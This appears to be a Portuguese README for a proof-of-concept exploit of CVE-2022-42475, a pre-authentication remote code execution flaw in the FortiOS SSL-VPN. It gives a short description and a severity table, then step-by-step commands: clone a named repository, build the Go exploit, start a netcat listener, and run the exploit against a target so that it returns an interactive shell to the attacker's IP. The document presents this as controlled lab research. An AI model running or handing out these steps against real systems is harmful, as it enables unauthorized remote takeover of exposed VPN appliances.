
Prova de Conceito (PoC) para pesquisa e validação controlada em laboratório da CVE-2022-42475, uma vulnerabilidade crítica de estouro de buffer baseado em heap que afeta o serviço SSL-VPN em determinadas versões do FortiOS.
Execução Remota de Código Pré-Autenticação no SSL VPN da Fortinet
CVE-2022-42475 é uma vulnerabilidade de heap-based buffer overflow no serviço SSL VPN do FortiOS que permite a atacantes não autenticados executar código arbitrário de forma remota (RCE) por meio de solicitações HTTP especialmente elaboradas direcionadas ao endpoint /remote/error.
Esta vulnerabilidade foi explorada ativamente na natureza (0-day) antes da publicação do patch oficial.
A captura a seguir mostra a execução do PoC em um ambiente de laboratório autorizado:
A saída mostra a execução do PoC e a interação com a instância do FortiOS utilizada para os testes.

| Campo | Valor |
|---|
| CVE ID | CVE-2022-42475 |
| CVSS 3.1 | 9.3 (Crítica) |
| Vector | CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| CWE | CWE-122 |
| Descoberto | Dezembro de 2022 |
| Patch oficial | FortiOS 7.2.3, 7.0.9, 6.4.11, 6.2.12, 6.0.16 |
# Clonar ou baixar o código-fonte
git clone https://github.com/uLl0a/cve-2022-42475-poc
cd cve-2022-42475-poc
# Compilar
go build -o exploit exploit.go
# Ou executar diretamente
go run exploit.go <target> <port> <reverse_ip> <params>
./exploit <target_host> <target_port> <reverse_ip> <param1> [param2...]
# No atacante, iniciar listener
nc -lvnp 80
# Executar o exploit
./exploit 192.168.1.100 443 10.0.0.5 /bin/sh -i